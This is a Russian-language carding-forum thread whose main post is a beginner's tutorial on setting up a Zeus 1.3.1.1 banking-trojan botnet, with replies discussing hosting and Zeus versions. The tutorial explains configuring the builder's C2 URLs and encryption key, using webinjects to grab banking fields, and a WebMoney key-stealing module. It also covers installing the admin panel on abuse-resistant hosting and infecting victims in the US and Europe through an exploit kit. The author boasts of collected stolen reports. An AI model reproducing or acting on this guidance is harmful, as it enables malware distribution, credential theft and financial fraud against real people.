Ботнет на базе Zeus 1.3.1.1

[Deymos]

Как видно из названия статейки речь сегодня пойдет о создании собственного ботнета. Что такое ботнет я объяснять не буду так как об этом говорилось уже и не раз и не два. И так приступим

Введение

И так нам нужен билдер бота, в нашем случае это Zeus bild 1.3.1.1
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
как видно мы используем фейк от "b1sh0p" который был скомпилирован
"Build time: 19[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]17 23.08.2009 GMT" эту информацию мы видим в меню "Information" но нам нужно меню "Builder"
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
и так тут мы видим пусть до билдера, и 3 кнопки с помощью которого мы и будим создавать нашего бота!!!!

Немного о строении билдера:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
давайте ка я вам поясню что у нас тут что:

1. server[php] 1277 - это админ панель которая ставиться на хост... о ней мы поговорим позднее.
2. cfg1.bin - это резервный конфиг фаил который должен лежать на 2(резрвном абузоустойчивом сервере)
3. config.bin - наш основной конфиг который мы скоро будим генерить под свой хост.
4. config.txt - это и есть наш фаил настройки в котором мы будим прописывать все настройки бота, и в дальнейшем компилить билд.
5. webinjects.txt - это 1 из самых важных фаилов... Это сборка инжектов(грубо говоря инструкция какие поля и какие лини грабить)
6. modul.exe - это вебмани модуль который ворует серты ключики ну и всю лабуду связаную с вебмани(По ру не работайте не срите там где живете!)
7. zsb.exe - это наш билдер с помощью которого мы и будим настраивать бота!

И так приступим!!!!!
и так нажимаем кнопочку "Edit сonfig" мы видим:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
что открылся фаил "config.txt" который нам нужно отредактировать под свои нужны.

Расскажу вкратце что тут у нас и как:
(нужные нам поля в фаиле config.txt)

url_config "http://Твой_сайт/config.bin" - фаил конфига чтобы к которым боты коннектяться и получают инфу о изменении(например если ты переехал на другой абузоустойчивый сервер)
url_compip "http://Твой_сайт/cp.php" 1024 - Эта главная страница нашей админки по этому линку мы будим коннектиться и логиниться к админ панели.

url_loader "http://Твой_сайт/bot.exe" - это наш бот нужен он тут для того чтобы наши боты всегда были актуальны.
url_server "http://Твой_сайт/gate.php" - это тот скрипт который принимает отчеты от наших ботов.


encryption_key "sys_admin" - это ключик чтобы расшифровать то что нам прислали наши боты.

Ну вроде все больше нам тут нечего не нужно.

закрываем фаил config.txt с сохранением. ....

А вот нет кнопочку "Buil config" мы не жмем... нам нужен грамотный webinjects.txt который можно написать самому или купить у барыг на форумах!

выглядит он примерно так:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
И так когда мы заполучили грамотный webinjects.txt то можем жать кнопочку "Buil config" и получим на выходе:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
как раз таки необходимый нам "config.bin". Сохраняем его и идем дальше...

А дальше у нас кнопочка "Build loader" нажав на неё мы получим нашего бота который будит настроен на наш шайт и который будит брать настройки с "config.bin"... Выглядит это так:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
и так у нас теперь есть вирус и фаил для его полноценной работы...
подготовку мы закончили перейдем к основной части нашего замысла.

ЗЫ. не смотрите на мою свалку файлов в папке с билдером зевса... просто мне так удобней когда все под рукой))) все необходимые файлы я указал выше и дал описание к ним...

Установка админ панели

Админ панель нам нужно ставить на абузоустойчивый сервер чтобы если нашего бота спалят хостер не снес нашу админку и наши отчеты... Выбор абузы лежит полностью на ваших плечах.)))

фаилы нашей админ панели лежат в моем случае в папочке "server[php] 1277" и находиться там:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
и да хочу добавить что эту админ панель я модифицировал под себя...
в стандартной админке к билдеру 1.3.1.1 небыло фаила s.php(но в фаиле redir.php есть указание что этот фаил нам не обходим) так же в директории \system я добавил фаил fmt.php так как в фаиле s.php есть указание на этот файл(фаил s.php и fmt.php я взял из старой версии админ панели)... (Возможно эта модификация была лишней но почему-то боты мне не слали отчеты пока я не добавил эти файлы о_0)

И так выяснив из чего состоит админ панель нам надо её установить на наш абузоустойчивый сервер... залив все файлы на фтп(заливать нужно строго по тому линку который указали в config.txt например если ты залил [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] а в конфиге указал [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] то отчеты до тебя уже не дойдут!!!! БУДЬ ВНИМАТЕЛЕН) и так залив все фаилы на сервер идем по линку [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] прописываем все данные такие как логин и пароль до админки и данные для коннекта к базе данных... и так же не забываем указать правильный Encryption key: в нашем случае это sys_admin. Так же ставим флаги на Write reports to database и на Write reports to local path. это даст нам то что наши отчеты будут сохраняться как в базу так и в фаил...

И так если все установилось(а если все установилось то вы это увидите сами) при обращении к [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] мы увидим:


И так вводим логин и пароль указанный при установки админ панели и вуаля вы в админ панели...!!!!


ЗЫ. СЛЕДИТЕ ЗА ПРАВИЛЬНОСТЬЮ НАПИСАНИЯ ЛИНКОВ!!! ЭТО ЗАЛОГ УСПЕХА!!!!!
ЗЫЫ. Да кстати фаилы bot.exe и config.bin нам тоже надо залить на сервер.

Связка...

И так мы собрали бота и установили админ панель... возникает вопрос а что же нам делать дальше.... А дальше нам надо нашего бота впарить какому-нибудь дятлу желательно в Америке или Европе чтобы получить вкусных линкво)) и для этого мы будим использовать Связку эксплоитов... для этой статейки я выбрал более-менее нормальную связку под названием un-pack версии 1.5 выглядит эта прелесть так:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
как видно на скриншоте я прогрузил немного трафика и даже без перетяски связки она дает какой-то пробив о_0 меня самого это удивило когда я тестил связки но для новичков самое то!
И так что тут да как рассказывать лень да и хелп там хороший есть... единственный прикол в том что нужно найти фтп и проифреймить их... об этом я расскажу в другой статейки(в разработке обзор паблик связок создание из паблик связок своей полу приват связки и прогрузка трафика и крипт как exe так самой связки(для данной статейки я грузил не криптованные exe для более наглядной демонстрации))

и так мы видим что прогрузилось 4 уника и в админ панели мы видим:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
ну вот что то прогузилось и вот они отчеты за 10 дней(покаюсь там было ещё 1к отчетов я их удалил так как бота закосячил командами и он спалил что он протроянен и сменил все пароли...)

Ну вот вроде бы и все... Статейка ориентирована на новичков и имеет пару косяков(СДЕЛАНО СПЕЦИАЛЬНО ЧТОБЫ ВЫ УЧИЛИСЬ А НЕ СИДЕЛИ НА ВСЕМ ГОТОВОМ!!!!!!!!!!)


ЗЫ. Выбирайте норм связку и криптуйте EXE тогда успех вам гарантирован!!!!


Заключение...

И так мы сегодня рассмотрели как создать свой ботнет... как видите нечего тут сложного нету... НО вы столкнетесь с подводными течениями в которых вам придется разбираться самим...

Всем удачных экспериментов и хорошего прогруза!!!!!!

BuBliK for Carding.cc

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

[S_I_D]

Статья зачет
вот только какие права ставить на папки? и файлы...
и можно ли лепить на хостинг, но не абузоустойчевый

[Deymos]

Цитата:

Сообщение от S_I_D

и можно ли лепить на хостинг, но не абузоустойчевый

вряд ли тебе разрешит хостер, закроет - даже не спросит

[S_I_D]

Deymos, ну если ботов 200 будет...думаешь закроют?
я же не по 3к в день гружу, а по 3-4 штуки к примеру

[travakur]

Цитата:

Сообщение от S_I_D

Deymos, ну если ботов 200 будет...думаешь закроют?
я же не по 3к в день гружу, а по 3-4 штуки к примеру

я бы закрыл даже если бы вобще не рузили тока попадитесь, просто когда более 200 клиентов на сервере админ может не заметить ваш гейт, темболее если вы не создаете нагрузку и не приходят абузы так как вы не фига не грузите, купите пару к загрузок потом увидете как вас выгонят, но еслим хостер вобще в танке и пофиг че у него делают клиенты то радуйтесь что нашли такого хостера.

[Deymos]

да чет хз даже, у нас тут люди продавали хостинг и в открытую писали что терпят такие вещи!

[kalibr98]

видимо это антиабузнвй хостинг))

а статейка норм,для новичков потянет)

[sulaiman]

Статейка норм... была когда-то...
Обычный хостинг потянет 150-250 ботов.
Не советую использовать зевса до 2.*.* версии, если не хотите в дальнейшем потерять ботнет. Да и билдер вы нигде уже не купите. Проект Зеус умер...

[epiderm]

Цитата:

Сообщение от sulaiman

...Проект Зеус умер...

Zeus перешёл в закрытый режим существует версии 3+, купить действительно невозможно по слухам 35к+

[olegteror]

Цитата:

Сообщение от Deymos

Ну вот вроде бы и все... Статейка орейнтирована на новечков и имеит пару косяков(ЗДЕЛАНО СПЕЦИАЛЬНО ЧТОБЫ ВЫ УЧИЛИСЬ А НЕ СИДЕЛИ НА ВСЕМ ГОТОВОМ!!!!!!!!!!)

Цитата:

Сообщение от sulaiman

Не советую использовать зевса до 2.*.* версии, если не хотите в дальнейшем потерять ботнет. Да и билдер вы нигде уже не купите. Проект Зеус умер...

Более того Проэкт Zeus Мертв ужо давно

[sulaiman]

Хер ты угадал. Автор прекратил поддержку из-за недавней нашумевшей облавы фби и свалил. Подробностей не расрываю, но продукт будет существовать, только не таким, каким мы его знаем и не под этим именем.

[sulaiman]

Тут ничего не было

[maulo]

посоветуйте бесплатний хостинг, ато на phpnet.us нехватает прав даже на билдер скуль бази

[RoMu4]

Спасибо , всё работает.